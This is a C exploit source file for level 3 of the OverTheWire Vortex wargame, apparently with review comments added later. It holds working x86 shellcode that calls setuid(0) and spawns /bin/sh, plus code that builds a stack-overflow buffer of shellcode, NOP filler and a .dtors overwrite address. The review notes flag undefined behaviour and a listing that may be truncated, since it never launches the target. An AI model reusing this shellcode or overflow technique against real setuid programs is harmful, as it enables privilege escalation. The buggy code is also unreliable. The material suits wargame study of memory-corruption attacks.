- /* Vortex wargames exploit for level 3 - http://www.overthewire.org/wargames/vortex/level03
- * by al3x - 2008.
- * Stack based buffer overflow to overwrite lpp pointer which has to be in the correct range.
- * if (((unsigned long) lpp & 0xffff0000) != 0x08040000)
- *
- * 28 **lpp = (unsigned long) &buf;
- * Writes the address of the buffer into the dtors section by using
- * 08049610 l O .data 00000000 p.5841
- */
- #include <unistd.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- /* Single-byte filler value; main() writes it into every element of nops[]. */
- #define NOP 0x90
- /*
- * 32 bytes setuid(0) + execve("/bin/sh",["/bin/sh",NULL]);
- *
- * 32-bit x86 code for the Linux int $0x80 syscall interface. The per-line
- * annotations show two syscalls: eax is loaded with 0x17 before the first
- * int $0x80 and with 0xb before the second.
- * The two pushed dwords spell "//sh" and "/bin", so the path built on the
- * stack is "/bin//sh" rather than the "/bin/sh" named above.
- * sizeof(shellcode) also counts the literal's implicit terminating NUL.
- * NOTE(review): the payload only has an effect if the target lets control
- * reach a writable data buffer that is also executable, and presumably only
- * gains privilege when the target is setuid; confirm against the level's
- * build. Non-executable data mappings stop this class of payload.
- */
- char shellcode[] =
- "\x6a\x17" // push $0x17
- "\x58" // pop %eax          (eax = 0x17)
- "\x31\xdb" // xor %ebx, %ebx  (first argument = 0)
- "\xcd\x80" // int $0x80       (first syscall)
- "\x31\xd2" // xor %edx, %edx  (edx = 0, reused as the NULL terminator)
- "\x6a\x0b" // push $0xb
- "\x58" // pop %eax          (eax = 0xb)
- "\x52" // push %edx         (string terminator)
- "\x68\x2f\x2f\x73\x68" // push $0x68732f2f  ("//sh")
- "\x68\x2f\x62\x69\x6e" // push $0x6e69622f  ("/bin")
- "\x89\xe3" // mov %esp, %ebx  (ebx -> path string)
- "\x52" // push %edx         (argv terminator)
- "\x53" // push %ebx         (argv[0] -> path string)
- "\x89\xe1" // mov %esp, %ecx  (ecx -> argv array)
- "\xcd\x80"; // int $0x80       (second syscall)
- /*
- * Assembles the level-3 argument buffer: shellcode bytes, then the NOP
- * filler, then the 4-byte little-endian address 0x08049610, and places it
- * next to argv[1] in a new argument vector.
- * NOTE(review): the listing ends right after nargv is initialised; nargv and
- * ret are never used, so as pasted this only builds the buffer. The paste may
- * be truncated.
- * NOTE(review): several statements below are undefined behaviour in C (see
- * the inline notes), so the buffer contents are not reliable as written.
- */
- int main(int argc, char *argv[]) {
- // NOTE(review): prints the usage line but does not return, so execution
- // continues with argv[1] possibly NULL.
- if (argc != 2)
- printf("%s <vuln program>\n",argv[0]);
- // Little-endian bytes of 0x08049610, the address quoted in the file header.
- char addr[] = "\x10\x96\x04\x08";
- // Filler array; every element is set to NOP below, so it has no NUL terminator.
- char nops[97];
- int i, len, ret;
- // 32 + 97 + 4 = 133
- // NOTE(review): the sizeof values used below include the terminating NUL of
- // shellcode and addr, so len is larger than the figure in the comment above.
- // NOTE(review): sizeof yields size_t; printing it with %d is a format
- // mismatch (%zu is the matching specifier).
- printf("sclen = %d\n", sizeof(shellcode));
- printf("nops = %d\n",sizeof(nops));
- printf("addr = %d\n",sizeof(addr));
- len = sizeof(shellcode) + sizeof(nops) + sizeof(addr);
- // Variable-length array, left uninitialised; only the memcpy'd ranges are
- // defined and no terminator is written explicitly.
- char buf[len];
- // strlen() stops at the literal's NUL, so the terminator is not copied.
- memcpy(buf, shellcode,strlen(shellcode));
- // NOTE(review): compares a signed int against a size_t.
- for (i = 0; i < sizeof(nops); i++)
- nops[i] = NOP;
- // NOTE(review): nops[] has no terminator, so strlen(nops) reads past the end
- // of the array (undefined behaviour); the copy length and the offset used on
- // the next line are therefore not guaranteed to be 97.
- memcpy(buf+strlen(shellcode),nops,strlen(nops));
- memcpy(buf+(strlen(shellcode)+strlen(nops)),addr,strlen(addr));
- // Argument vector: target program path, the assembled buffer, NULL terminator.
- char *nargv[] = {argv[1],buf, (char *)0};
- }